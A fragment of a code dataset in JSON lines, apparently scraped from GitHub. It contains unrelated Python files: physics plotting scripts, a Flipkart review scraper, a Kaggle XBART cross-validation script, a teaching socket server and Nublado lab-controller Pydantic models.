type=int)\n parser.add_argument('-o', '--output-dir', default='plots')\n return parser.parse_args()\n\ndef run():\n args = get_args()\n with File(args.input_file, 'r') as h5file:\n jets_chunk = h5file['jets'][:args.nevents]\n # draw_jets(jets_chunk, args.output_dir)\n if 'tracks' in h5file:\n tracks_chunk = h5file['tracks'][:args.nevents]\n draw_tracks(tracks_chunk, jets_chunk, args.output_dir)\n\nsig_color = (1, 0, 0, 0.5)\nbg_color = (0, 0, 1, 0.5)\n\ndef add_nan_count(ax, count_sig, count_bg):\n ax.text(0.9,0.9, f'NaNs, sig: {count_sig}, bg: {count_bg}',\n va='top', ha='right',\n transform=ax.transAxes)\n\ndef draw_tracks(tracks_chunk, jets_chunk, out_dir):\n signal_idx = (jets_chunk['LabDr_HadF'] == 5)\n bg_idx = (jets_chunk['LabDr_HadF'] == 0)\n n_masked = np.count_nonzero(tracks_chunk['mask'], axis=1)\n n_tracks = tracks_chunk.shape[1] - n_masked\n count_bins = np.arange(-0.5, 20.5, 1)\n with Canvas(f'{out_dir}/n_tracks.pdf') as can:\n can.ax.hist(n_tracks[signal_idx], color=sig_color, bins=count_bins)\n can.ax.hist(n_tracks[bg_idx], color=bg_color, bins=count_bins)\n\n d0sig_bins = np.linspace(-50, 75, 40)\n leading_track_d0 = tracks_chunk['d0sig_ls'][:,0]\n valid_leading = ~tracks_chunk['mask'][:,0]\n with Canvas(f'{out_dir}/leading_track_d0sig.pdf') as can:\n can.ax.hist(leading_track_d0[valid_leading & signal_idx],\n color=sig_color, label='bottom', bins=d0sig_bins)\n can.ax.hist(leading_track_d0[valid_leading & bg_idx],\n color=bg_color, label='light', bins=d0sig_bins)\n can.ax.legend()\n can.ax.set_yscale('log')\n\n valid_sig_track = ~tracks_chunk['mask'] & signal_idx[:,None]\n valid_bg_track = ~tracks_chunk['mask'] & bg_idx[:,None]\n signal_d0sig = tracks_chunk['d0sig_ls'][valid_sig_track]\n bg_d0sig = tracks_chunk['d0sig_ls'][valid_bg_track]\n with Canvas(f'{out_dir}/track_d0sig.pdf') as can:\n can.ax.hist(leading_track_d0[valid_leading & signal_idx],\n color=sig_color, label='bottom', bins=d0sig_bins)\n can.ax.hist(leading_track_d0[valid_leading & bg_idx],\n color=bg_color, label='light', bins=d0sig_bins)\n can.ax.legend()\n can.ax.set_yscale('log')\n\ndef draw_jets(jets_chunk, out_dir):\n signal_idx = (jets_chunk['LabDr_HadF'] == 5)\n bg_idx = (jets_chunk['LabDr_HadF'] == 0)\n signal = jets_chunk[signal_idx]\n bg = jets_chunk[bg_idx]\n for var in jets_chunk.dtype.names:\n with Canvas(f'{out_dir}/{var}.pdf') as can:\n def get_good(vals):\n good = ~np.isnan(vals[var])\n return vals[var][good]\n def count_nan(vals):\n return np.isnan(vals[var]).sum()\n can.ax.hist(get_good(signal), color=sig_color)\n can.ax.hist(get_good(bg), color=bg_color)\n can.ax.set_xlabel(var, x=0.98, ha='right', size=12)\n sig_nan, bg_nan = count_nan(signal), count_nan(bg)\n add_nan_count(can.ax, sig_nan, bg_nan)\n\nif __name__ == '__main__':\n run()\n","repo_name":"dguest/btag2text","sub_path":"scripts/btag-draw-from-hdf5.py","file_name":"btag-draw-from-hdf5.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41971753966","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom bs4 import BeautifulSoup as bs\n\n\n# In[3]:\n\n\nimport requests\n\n\n# In[4]:\n\n\nlink=\"https://www.flipkart.com/google-pixel-7-snow-128-gb/p/itm45d75002be0e7?pid=MOBGHW44PRZ8WP2M&lid=LSTMOBGHW44PRZ8WP2MEGIXNO&marketplace=FLIPKART&store=tyy%2F4io&srno=b_1_3&otracker=hp_bannerads_1_2.bannerAdCard.BANNERADS_Cat-Mob-HPW2-Pixel%2B7-_OI204387L9YV&fm=neo%2Fmerchandising&iid=b72a85a6-eaf9-476e-adad-fb9bf1c7acf0.MOBGHW44PRZ8WP2M.SEARCH&ppt=hp&ppn=homepage&ssid=6512vadlsg0000001669195963995\"\n\n\n# In[5]:\n\n\npage=requests.get(link)\n\n\n# In[7]:\n\n\npage\n\n\n# In[11]:\n\n\npage.content\n\n\n# In[13]:\n\n\nsoup=bs(page.content,\"html.parser\")\nsoup\n\n\n# In[15]:\n\n\nprint(soup.prettify())\n\n\n# # Title of the Product\n\n# In[17]:\n\n\ntitle=soup.title\n\n\n# In[19]:\n\n\nprint(soup.title)\n\n\n# In[21]:\n\n\nprint(type(soup))\n\n\n# In[23]:\n\n\nprint(title.string)\n\n\n# # Check Product Price\n\n# In[27]:\n\n\nprice=soup.find_all(\"div\",class_=\"_30jeq3 _16Jk6d\")\n\n\n# In[29]:\n\n\nprice\n\n\n# In[32]:\n\n\nproduct_price=[]\n\nfor i in range(0,len(price)):\n product_price.append(price[i].get_text())\n\n\n# In[34]:\n\n\nproduct_price\n\n\n# In[36]:\n\n\nprice[i].get_text()\n\n\n# # Scrap Customer Names\n\n# In[38]:\n\n\nnames=soup.find_all(\"p\",class_=\"_2sc7ZR _2V5EHH\")\nnames\n\n\n# In[40]:\n\n\ncust_name=[]\n\nfor i in range(0,len(names)):\n cust_name.append(names[i].get_text())\n\n\n# In[42]:\n\n\ncust_name\n\n\n# In[50]:\n\n\nfor i in range(0,len(cust_name)):\n print(cust_name[i])\n\n\n# # Scrap Reviews\n\n# In[52]:\n\n\nreview=soup.find_all(\"p\",class_=\"_2-N8zT\")\nreview\n\n\n# In[54]:\n\n\ncust_rev=[]\n\nfor i in range(0,len(review)):\n cust_rev.append(review[i].get_text())\n\n\n# In[56]:\n\n\ncust_rev\n\n\n# In[58]:\n\n\nfor i in range(0,len(cust_rev)):\n print(cust_rev[i])\n\n\n# # Scrap Comments\n\n# In[61]:\n\n\ncomment=soup.find_all(\"div\",class_=\"t-ZTKy\")\ncomment\n\n\n# In[62]:\n\n\ncust_comment=[]\n\n\nfor i in range(0,len(comment)):\n cust_comment.append(comment[i].get_text())\n\n\n# In[64]:\n\n\ncust_comment\n\n\n# In[66]:\n\n\nfor i in range(0,len(cust_comment)):\n print(cust_comment[i])\n\n\n# # Scrap Rating\n\n# In[67]:\n\n\nrating=soup.find_all(\"div\",class_=\"_3LWZlK _1BLPMq\")\nrating\n\n\n# In[68]:\n\n\ncust_rating=[]\n\nfor i in range(0,len(rating)):\n cust_rating.append(rating[i].get_text())\n\n\n# In[70]:\n\n\ncust_rating\n\n\n# In[73]:\n\n\nfor i in range(0,len(cust_rating)):\n print(cust_rating[i])\n\n\n# In[74]:\n\n\nimport pandas as pd\n\n\n# In[75]:\n\n\ndf=pd.DataFrame()\n\ndf[\"Customer Names\"]=cust_name\ndf[\"Customer Review\"]=cust_rev\ndf[\"Customer Comment\"]=cust_comment\ndf[\"Ratings\"]=cust_rating\n\n\n# In[79]:\n\n\ndf\n\n","repo_name":"siddhantjangam/flipkart-webscrapping","sub_path":"flipkart webscrapping.py","file_name":"flipkart webscrapping.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29032560692","text":"import sys\nimport pyPROPOSAL\nimport math\nimport time\nimport datetime\nimport os\n\nfrom matplotlibconfig import *\n\nfrom decimal import Decimal\n\ntry:\n import matplotlib\n matplotlib.use(\"Agg\")\n\n import matplotlib.pyplot as plt\n from matplotlib.colors import LogNorm\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n\nexcept ImportError:\n print(\"Matplotlib not installed!\")\n\nimport numpy as np\n# np.set_printoptions(threshold='nan')\n\n\nclass ProgressBar(object):\n\n def __init__(self, loops, bar_lenght=50, start=0, **keywords):\n\n self._bar_lenght = bar_lenght\n self._bar = []\n self._loops = loops\n self._start = float(start)\n self._current_loop = start\n\n self._started_process = False\n self._start_time = None\n\n self._pacman = False\n\n self._status = \"\"\n self._text = \"\\rPercent: [{0}] {1}% Time: {2} Iteration: {3}/{4} {5}\"\n\n self._bar_full = \"=\"\n self._bar_empty = \" \"\n\n for key, value in keywords.items():\n if key is \"pacman\":\n assert type(value) is bool\n self._pacman = value\n\n if self._pacman:\n self._bar_full = \"-\"\n self._bar_empty = \"o\"\n\n current = self._bar_empty\n for i in range(self._bar_lenght):\n if current is self._bar_empty:\n current = \" \"\n self._bar.append(current)\n else:\n current = self._bar_empty\n self._bar.append(current)\n else:\n for i in range(self._bar_lenght):\n self._bar.append(self._bar_empty)\n\n self._current_pac_state = \"C\"\n self._current_pac_block = 0\n\n def reset(self):\n self._current_loop = self._start\n self._status = \"\"\n self._started_process = False\n\n def start(self):\n self._started_process = True\n self._start_time = time.time()\n\n def update(self):\n if self._started_process is False:\n print(\"Pleas start ProgressBar before updating it!\")\n return\n\n self._current_loop += 1.0\n progress = self._current_loop / self._loops\n\n if progress >= 1.0:\n self._status = \"Done...\\n\"\n\n if self._pacman:\n block = int((self._bar_lenght - 1) * progress)\n\n if self._current_pac_block < block:\n self._current_pac_block = block\n if self._current_pac_state is \"c\":\n self._current_pac_state = \"C\"\n else:\n self._current_pac_state = \"c\"\n else:\n pass\n\n self._bar[block] = '\\033[1m' + \"\\033[93m\" + \\\n self._current_pac_state + '\\033[0m'\n self._bar[:block] = block * [self._bar_full]\n else:\n block = int(self._bar_lenght * progress)\n self._bar[:block] = baxislock * [self._bar_full]\n\n text = self._text.format(\n \"\".join(self._bar),\n progress*100,\n str(datetime.timedelta(seconds=(time.time() - self._start_time))),\n int(self._current_loop),\n self._loops,\n self._status\n )\n\n sys.stdout.write(text)\n sys.stdout.flush()\n\n\ndef save_number_to_tex(number, filename):\n text_file = open(filename, \"w\")\n text_file.write(number)\n text_file.close()\n\ndef plot_hist(ax, prim, sec, label):\n\n x_space = np.logspace( 2, 14, 100)\n y_space = np.logspace( -2, 14, 100)\n\n hist = ax.hist2d(prim, sec, bins=(x_space, y_space), norm=LogNorm())\n\n textstr = label\n \n props = dict(facecolor='white', alpha=0.8, edgecolor='none')\n ax.text(0.1, 0.9, textstr,\n verticalalignment='top', horizontalalignment='left',\n transform=ax.transAxes, fontsize=font_size, bbox=props)\n\n ax.set_xscale(\"log\", nonposx='clip')\n ax.set_yscale(\"log\", nonposy='clip')\n\n ax.grid(grid_conf)\n\n count = sum([sum(x) for x in hist[0]])\n esum = sum(sec)\n\n return (ax, hist, count, esum)\n\nif __name__ == \"__main__\":\n\n import sys\n\n # =========================================================\n # \tCommandline args\n # =========================================================\n\n statistics = int(5e3)\n config_file = \"resources/config_ice.json\"\n\n if len(sys.argv) == 2:\n statistics = int(sys.argv[1])\n elif len(sys.argv) == 3:\n statistics = int(sys.argv[1])\n config_file = sys.argv[2]\n\n # =========================================================\n # PROPOSAL\n # =========================================================\n\n prop = pyPROPOSAL.Propagator(\n particle_def=pyPROPOSAL.particle.MuMinusDef.get(),\n config_file=config_file\n )\n\n mu = prop.particle\n\n E_max_log = 14\n\n epair_primary_energy = []\n epair_secondary_energy = []\n\n brems_primary_energy = []\n brems_secondary_energy = []\n\n ioniz_primary_energy = []\n ioniz_secondary_energy = []\n\n photo_primary_energy = []\n photo_secondary_energy = []\n\n length = []\n n_secondarys = []\n\n progress = ProgressBar(statistics, pacman=True)\n progress.start()\n\n for i in range(statistics):\n progress.update()\n\n mu.position = pyPROPOSAL.Vector3D(0, 0, 0)\n mu.direction = pyPROPOSAL.Vector3D(0, 0, -1)\n mu.energy = math.pow(10, E_max_log)\n mu.propagated_distance = 0\n\n secondarys = prop.propagate()\n\n length.append(mu.propagated_distance / 100)\n n_secondarys.append(len(secondarys))\n\n for sec in secondarys:\n sec_energy = sec.energy\n energy = sec.parent_particle_energy\n\n if sec.id == pyPROPOSAL.particle.Data.Epair:\n epair_primary_energy.append(energy)\n epair_secondary_energy.append(sec_energy)\n if sec.id == pyPROPOSAL.particle.Data.Brems:\n brems_primary_energy.append(energy)\n brems_secondary_energy.append(sec_energy)\n if sec.id == pyPROPOSAL.particle.Data.DeltaE:\n ioniz_primary_energy.append(energy)\n ioniz_secondary_energy.append(sec_energy)\n if sec.id == pyPROPOSAL.particle.Data.NuclInt:\n photo_primary_energy.append(energy)\n photo_secondary_energy.append(sec_energy)\n\n # =========================================================\n # Plot\n # =========================================================\n\n plt.rcParams.update(params)\n\n\n fig, axes = plt.subplots(nrows=2, ncols=2, \n figsize=(width , 0.7*width), sharex=True, sharey=True\n )\n\n hists = []\n counts = []\n esums = []\n primary_energies = [epair_primary_energy, brems_primary_energy, photo_primary_energy, ioniz_primary_energy]\n secondary_energies = [epair_secondary_energy, brems_secondary_energy, photo_secondary_energy, ioniz_secondary_energy]\n labels = [r'$e$ pair production', \"Bremsstrahlung\", \"Photonuclear\", \"Ionization\"]\n short_labels = ['epair', 'brems', 'photo', 'ioniz']\n\n for ax, primary_energy, secondary_energy, label in zip(axes.flat, primary_energies, secondary_energies, labels):\n \tax, hist_tmp, count, esum = plot_hist(ax, primary_energy, secondary_energy, label)\n \thists.append(hist_tmp[3])\n \tcounts.append(count)\n \tesums.append(esum)\n fig.tight_layout(rect=(0.02, 0.02, 1, 1)) # rect = (0,0,1,1) is the default option\n\n fig.subplots_adjust(wspace=0.15, hspace=0.1, right=0.88)\n cbar_ax = fig.add_axes([0.91, 0.15, 0.03, 0.7])\n fig.colorbar(hists[3], cax=cbar_ax)\n\n fig.add_subplot(111, frameon=False)\n # hide tick and tick label of the big axis\n plt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\n plt.xlabel(r'$ E_{\\textrm{primary}}\\,/\\, \\mathrm{MeV} $')\n plt.ylabel(r'$ E_{\\textrm{primary}} \\cdot v \\,/\\, \\mathrm{MeV} $', labelpad=10)\n\n fig.savefig(\"build/secondary_number.pdf\",bbox_inches='tight')\n\n # Save stuff\n\n for count, esum, label in zip(counts, esums, short_labels):\n print(label + \":\")\n\n print(\"Counts:\")\n tmp = '%.2E' % Decimal(count)\n print(tmp)\n save_number_to_tex(tmp, 'build/numbers/' + label + '_count.tex')\n\n print(\"E_sum:\")\n tmp = '%.2E' % Decimal(esum)\n print(tmp)\n save_number_to_tex(tmp, 'build/numbers/' + label + '_esum.tex')\n\n\n","repo_name":"Jean1995/Masterarbeit","sub_path":"Plots/secondary_number.py","file_name":"secondary_number.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10538189362","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport gc\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import StratifiedKFold,KFold\nfrom sklearn.metrics import mean_squared_error,log_loss\nfrom collections import OrderedDict\nimport warnings\nwarnings.filterwarnings('ignore')\nnp.random.seed(4590)\n\nfrom XBART import XBART\n\nprint(\"Reading Data...\")\npath = \"/Users/saaryalov/Kaggle/ELO/saar_model/Data_2/\"\n\n# df_train = pd.read_csv( path+ 'train_ok2_xbart_4.csv')\n# df_test = pd.read_csv(path+ 'test_ok2_xbart_4.csv')\n\ndf_train = pd.read_csv( path+ 'train_ok2_xbart_norm_1.csv')\ndf_test = pd.read_csv(path+ 'test_ok2_xbart_norm_1.csv')\n\nprint(df_train.shape)\nprint(df_test.shape)\n\n\nprint('Preprocess...')\ntarget = df_train['target']\ndel df_train['target']; \n\nprint(target.shape)\n#del df_train['Unnamed: 0']; del df_test['Unnamed: 0'];\nfeatures = [c for c in df_train.columns if c not in ['card_id', 'first_active_month','outliers']]\ncont = [\"new_hist_purchase_amount_var\",\n\"new_hist_purchase_amount_mean\",\n\"hist_month_lag_var\",\n\"new_hist_purchase_date_max\",\n\"hist_purchase_date_max\",\n\"hist_purchase_date_min\",\n\"hist_purchase_amount_sum\",\n\"hist_purchase_amount_var\",\n\"hist_purchase_amount_mean\" ]\n\ncat= ['new_hist_purchase_date_uptonow',\n 'hist_month_diff_mean',\n 'hist_category_1_sum',\n 'new_hist_category_1_sum',\n 'new_hist_purchase_amount_max',\n 'hist_merchant_id_nunique',\n 'new_hist_month_lag_mean',\n 'elapsed_time',\n 'new_hist_installments_mean',\n 'new_hist_month_diff_mean',\n 'hist_category_1_mean',\n 'new_hist_card_id_size',\n 'new_hist_purchase_date_diff',\n 'hist_purchase_date_uptonow',\n 'hist_month_nunique',\n 'hist_authorized_flag_mean',\n 'feature_1',\n 'hist_installments_sum',\n 'new_hist_merchant_category_id_nunique',\n 'hist_first_buy',\n 'hist_month_lag_mean',\n 'hist_purchase_amount_min',\n 'hist_category_3_mean_mean',\n 'hist_weekofyear_nunique',\n 'hist_purchase_date_average',\n 'new_hist_purchase_date_average',\n 'hist_subsector_id_nunique',\n 'new_hist_purchase_amount_min',\n 'new_hist_month_lag_var',\n 'new_hist_installments_var',\n 'hist_installments_mean',\n 'hist_purchase_date_diff',\n 'hist_category_2_mean_mean',\n 'new_hist_category_3_mean_mean',\n 'hist_merchant_category_id_nunique']\nfeatures = cont+ cat\n\nprint(features)\nprint(\"Define XBART Model\")\nm = 20\ntau = .67*np.var(target)/m\nparams = OrderedDict([('M',m),('L',1),(\"N_sweeps\",250)\n\t\t\t\t\t\t\t,(\"Nmin\",1),(\"Ncutpoints\",30)\n\t\t\t\t\t\t\t,(\"alpha\",0.95),(\"beta\",1.75),(\"tau\",tau),\n\t\t\t\t\t\t\t(\"burnin\",15),(\"mtry\",8),(\"max_depth_num\",30),\n\t\t\t\t\t\t\t(\"draw_sigma\",False),(\"kap\",16),(\"s\",4),(\"verbose\",True),\n\t\t\t\t\t\t\t(\"m_update_sigma\",False),(\"parallel\",False)])\n\n\n\nprint(\"CV\")\nfolds = KFold(n_splits=5, shuffle=True, random_state=2333)\noof = np.zeros(len(df_train))\npredictions = np.zeros(len(df_test))\n\n\nxbart = XBART(params)\n# xbart.fit_2d_all(df_train[features].values,target.values,len(cat))\n# predictions += xbart.predict_2d_all(df_test[features].values)[:,params[\"burnin\"]:].mean(axis=1)\nfor fold_, (trn_idx, val_idx) in enumerate(folds.split(df_train)):\n print(\"fold {}\".format(fold_))\n # trn_data = df_train.iloc[trn_idx][features], label=target.iloc[trn_idx])#, categorical_feature=categorical_feats)\n # val_data = lgb.Dataset(df_train.iloc[val_idx][features], label=target.iloc[val_idx])#, categorical_feature=categorical_feats)\n print(\"Fitting\")\n xbart.fit_2d_all(df_train.iloc[trn_idx][features].values,target.iloc[trn_idx].values,0)\n\n print(\"Get train\")\n y_pred_train = xbart.predict_2d_all(df_train.iloc[trn_idx][features].values)[:,params[\"burnin\"]:].mean(axis=1)\n print(\"Fold {} has score: {:<8.5f}\".format(fold_,mean_squared_error(y_pred_train, target.iloc[trn_idx].values)**0.5))\n\n print(\"Pred oof\")\n y_pred_oof = xbart.predict_2d_all(df_train.iloc[val_idx][features].values)[:,params[\"burnin\"]:].mean(axis=1)\n print(\"Fold {} has score: {:<8.5f}\".format(fold_,mean_squared_error(y_pred_oof, target.iloc[val_idx].values)**0.5))\n oof[val_idx] = y_pred_oof/folds.n_splits\n print(\"Pred test\")\n predictions += xbart.predict_2d_all(df_test[features].values)[:,params[\"burnin\"]:].mean(axis=1)/ folds.n_splits\n\npredictions_df = pd.concat([df_test[\"card_id\"],pd.Series(predictions)],axis=1)\npredictions_df.to_csv(\"xbart_pred_3.csv\",index=False)\noof.to_csv(\"xbart_off_3.csv\",index=False)\nprint(\"CV score: {:<8.5f}\".format(mean_squared_error(oof, target.values)**0.5))\n\n","repo_name":"socket778/XBCF","sub_path":"python_xbcf/tests/OutlierModel.py","file_name":"OutlierModel.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"25404834757","text":"import socket\r\nimport base64\r\n \r\nMSG_DATA = b'SGVsbG8gV29ybGQhICBZb3UgaGF2ZSByZWNlaXZlZCBhIG1lc3NhZ2Ugb3ZlciBhIHNvY2tldA=='\r\nHOST = '127.0.0.1' # Symbolic name meaning all available interfaces\r\nPORT = 9231 # Arbitrary non-privileged port\r\n \r\nclass SocketServer():\r\n def __init__(self, bindHost = HOST, bindPort = PORT):\r\n \"\"\"Create a generic socket for binding\"\"\"\r\n self.theSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print('Socket created')\r\n\r\n try:\r\n self.theSocket.bind((bindHost, bindPort))\r\n except socket.error as msg:\r\n print('Bind failed. Error Code : ' + msg.strerror)\r\n exit()\r\n\r\n print('Socket bind complete; ready to send message')\r\n \r\n def listen(self):\r\n \"\"\"Opens the socket for listening. Once connected returns the connection stream for message transmission\"\"\"\r\n self.theSocket.listen(0)\r\n print('Socket now listening')\r\n \r\n #wait to accept a connection - blocking call\r\n self.conn, self.addr = self.theSocket.accept()\r\n\r\n print('Connected with ' + self.addr[0] + ':' + str(self.addr[1]))\r\n return self.conn\r\n\r\n def transmit(self, msg):\r\n \"\"\"Transmits a message across the socket\"\"\"\r\n # send our message to the client\r\n self.conn.sendall(msg)\r\n \r\n def close(self):\r\n \"\"\"Closes the socket and releases the port\"\"\"\r\n # close the connection and the socket\r\n self.conn.close()\r\n self.theSocket.close()\r\n\r\ndef main():\r\n print( \"My IP address is\", socket.gethostbyname(socket.gethostname()), flush=True )\r\n socketObj = SocketServer()\r\n socketObj.listen()\r\n socketObj.transmit(base64.b64decode(MSG_DATA))\r\n socketObj.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"NathanRuprecht/CS210_IntroToProgramming","sub_path":"DailyLabs/Lsn33/SimpleSocketServer.py","file_name":"SimpleSocketServer.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12243818838","text":"\"\"\"API-visible models for user lab environments.\"\"\"\n\nfrom __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Any, Self\n\nfrom kubernetes_asyncio.client import V1ResourceRequirements\nfrom pydantic import BaseModel, Field, field_validator, model_validator\n\nfrom ...constants import DROPDOWN_SENTINEL_VALUE, USERNAME_REGEX\nfrom ..domain.gafaelfawr import GafaelfawrUserInfo, UserGroup\n\n__all__ = [\n \"ImageClass\",\n \"LabResources\",\n \"LabSize\",\n \"LabSpecification\",\n \"LabStatus\",\n \"PodState\",\n \"ResourceQuantity\",\n \"UserGroup\",\n \"UserInfo\",\n \"UserLabState\",\n \"UserOptions\",\n]\n\n\nclass LabSize(str, Enum):\n \"\"\"Allowable names for pod sizes.\n\n Taken from `d20 creature sizes`_.\n \"\"\"\n\n FINE = \"fine\"\n DIMINUTIVE = \"diminutive\"\n TINY = \"tiny\"\n SMALL = \"small\"\n MEDIUM = \"medium\"\n LARGE = \"large\"\n HUGE = \"huge\"\n GARGANTUAN = \"gargantuan\"\n COLOSSAL = \"colossal\"\n\n CUSTOM = \"custom\"\n \"\"\"A custom lab size.\n\n Used for lab sizes of existing labs that don't match any of our\n currently-configured sizes.\n \"\"\"\n\n\nclass LabStatus(Enum):\n \"\"\"Possible states the user's lab may be in.\"\"\"\n\n PENDING = \"pending\"\n RUNNING = \"running\"\n TERMINATING = \"terminating\"\n FAILED = \"failed\"\n\n @classmethod\n def from_phase(cls, phase: str) -> LabStatus:\n \"\"\"Convert a Kubernetes pod phase to a lab status.\n\n Be aware that it is not possible to detect Kubernetes pods that are in\n the process of being terminated by looking only at the phase\n (``Terminating`` is not a pod phase). This method will return\n ``RUNNING`` if the container is still running or ``FAILED`` if it has\n stopped.\n\n Parameters\n ----------\n phase\n Kubernetes pod phase, from the ``Pod`` object.\n\n Returns\n -------\n LabStatus\n Corresponding lab status.\n \"\"\"\n if phase == \"Running\":\n return cls.RUNNING\n elif phase == \"Pending\":\n return cls.PENDING\n else:\n return cls.FAILED\n\n\nclass PodState(Enum):\n \"\"\"Possible states the user's pod may be in.\"\"\"\n\n PRESENT = \"present\"\n MISSING = \"missing\"\n\n\n\"\"\"POST /nublado/spawner/v1/labs//create\"\"\"\n\n\nclass ImageClass(Enum):\n \"\"\"Supported classes of images.\n\n These keywords can be passed into the spawn form to spawn whatever image\n matches this class, as determined by the lab controller. This is primarily\n used when spawning notebooks for bot users.\n \"\"\"\n\n RECOMMENDED = \"recommended\"\n LATEST_RELEASE = \"latest-release\"\n LATEST_WEEKLY = \"latest-weekly\"\n LATEST_DAILY = \"latest-daily\"\n\n\nclass UserOptions(BaseModel):\n \"\"\"User-provided lab configuration options.\n\n All values to this model can instead be given as lists of length one with\n boolean values converted to the strings ``true`` or ``false``. This allows\n JupyterHub to pass its form submission directly to the lab controller\n without modifications.\n \"\"\"\n\n image_list: str | None = Field(\n None,\n examples=[\"lighthouse.ceres/library/sketchbook:w_2023_07@sha256:abcd\"],\n title=\"Image from selection radio button\",\n description=\"If this is set, `image_dropdown` should not be set.\",\n )\n image_dropdown: str | None = Field(\n None,\n examples=[\"lighthouse.ceres/library/sketchbook:w_2022_40\"],\n title=\"Image from dropdown list\",\n description=(\n \"If this is set, `image_list` should be omitted or set to\"\n f\" `{DROPDOWN_SENTINEL_VALUE}`.\"\n ),\n )\n image_class: ImageClass | None = Field(\n None,\n examples=[ImageClass.RECOMMENDED],\n title=\"Class of image to spawn\",\n description=(\n \"Spawn a class of image determined by the lab controller. Not\"\n \" used by the user form, but may be used by bots creating labs.\"\n \" Only one of `image_class` or `image_tag` may be given, and\"\n \" neither `image_list` nor `image_dropdown` should be set when\"\n \" using these options.\"\n ),\n )\n image_tag: str | None = Field(\n None,\n examples=[\"w_2023_07\"],\n title=\"Tag of image to spawn\",\n description=(\n \"Spawn the image with the given tag. Not used by the user form,\"\n \" but may be used by bots creating labs. Only one of `image_class`\"\n \" `image_tag` may be given, and neither `image_list` nor\"\n \" `image_dropdown` should be set when using these options.\"\n ),\n )\n size: LabSize = Field(..., examples=[LabSize.MEDIUM], title=\"Image size\")\n enable_debug: bool = Field(\n False,\n examples=[True],\n title=\"Enable debugging in spawned Lab\",\n )\n reset_user_env: bool = Field(\n False,\n examples=[True],\n title=\"Relocate user environment (`.cache`, `.jupyter`, `.local`)\",\n )\n\n @property\n def image_attribute(self) -> str:\n \"\"\"The name of the image attribute that was set.\n\n Used for error reporting to know what input attribute to report when\n the image specification was invalid.\n \"\"\"\n if self.image_list:\n return \"image_list\"\n elif self.image_dropdown:\n return \"image_dropdown\"\n elif self.image_class:\n return \"image_class\"\n else:\n return \"image_tag\"\n\n @model_validator(mode=\"before\")\n @classmethod\n def _validate_lists(\n cls, data: dict[str, Any] | Self\n ) -> dict[str, Any] | Self:\n \"\"\"Convert from lists of length 1 to values.\n\n JupyterHub passes the value of the input form directly to the lab\n controller via this model. This means that each submitted field is a\n list, due to implementation details of JupyterHub, but in each case\n the list must have exactly one element and we don't want the list\n wrapper. Also accept values without the list wrapping for direct calls\n to the lab controller via the same API.\n \"\"\"\n if not isinstance(data, dict):\n return data\n new_data = {}\n for key, value in data.items():\n if value is None:\n continue\n if isinstance(value, list):\n if not value:\n continue\n if len(value) != 1:\n raise ValueError(f\"Too many values for {key}\")\n new_data[key] = value[0]\n else:\n new_data[key] = value\n return new_data\n\n @model_validator(mode=\"after\")\n def _validate_one_image(self) -> Self:\n \"\"\"Ensure that the image is only specified in one way.\"\"\"\n if self.image_list == DROPDOWN_SENTINEL_VALUE:\n self.image_list = None\n\n # image_dropdown will have a spurious value if image_list is set,\n # due to the form design, so in that case use image_list. (Unless\n # it has the sentinel value, but that's handled above.)\n if self.image_list:\n self.image_dropdown = None\n\n # See which image attributes are set.\n values_set = {\n attr\n for attr in (\n \"image_list\",\n \"image_dropdown\",\n \"image_class\",\n \"image_tag\",\n )\n if getattr(self, attr, None)\n }\n\n # Check that exactly one of them is set.\n if len(values_set) < 1:\n raise ValueError(\"No image to spawn specified\")\n if len(values_set) > 1:\n keys = \", \".join(sorted(values_set))\n raise ValueError(f\"Image specified multiple ways ({keys})\")\n return self\n\n @field_validator(\"enable_debug\", \"reset_user_env\", mode=\"before\")\n @classmethod\n def _validate_booleans(cls, v: bool | str) -> bool:\n \"\"\"Convert boolean values from strings.\"\"\"\n if isinstance(v, bool):\n return v\n elif v == \"true\":\n return True\n elif v == \"false\":\n return False\n else:\n raise ValueError(f\"Invalid boolean value {v}\")\n\n @field_validator(\"size\", mode=\"before\")\n @classmethod\n def _validate_size(cls, v: Any) -> Any:\n \"\"\"Lab sizes may be title-cased, so convert them to lowercase.\"\"\"\n if isinstance(v, LabSize):\n return v\n elif isinstance(v, str):\n return v.lower()\n else:\n return v\n\n\nclass LabSpecification(BaseModel):\n \"\"\"Specification of lab to spawn, sent by the JupyterHub spawner.\"\"\"\n\n options: UserOptions = Field(\n ...,\n title=\"User-chosen lab options\",\n description=\"Represents the choices made on the spawner form\",\n )\n env: dict[str, str] = Field(\n ...,\n title=\"Environment variables\",\n description=(\n \"Environment variables from JupyterHub. JUPYTERHUB_SERVICE_PREFIX\"\n \" must be set\"\n ),\n )\n\n @field_validator(\"env\")\n @classmethod\n def _validate_env(cls, v: dict[str, str]) -> dict[str, str]:\n if \"JUPYTERHUB_SERVICE_PREFIX\" not in v:\n raise ValueError(\"JUPYTERHUB_SERVICE_PREFIX must be set\")\n return v\n\n\n\"\"\"GET /nublado/spawner/v1/labs/\"\"\"\n\"\"\"GET /nublado/spawner/v1/user-status\"\"\"\n\n\nclass UserInfo(BaseModel):\n \"\"\"Metadata about the user who owns the lab.\"\"\"\n\n username: str = Field(\n ...,\n examples=[\"ribbon\"],\n title=\"Username for Lab user\",\n pattern=USERNAME_REGEX,\n )\n name: str | None = Field(\n None,\n examples=[\"Ribbon\"],\n title=\"Human-friendly display name for user\",\n description=(\n \"May contain spaces, capital letters, 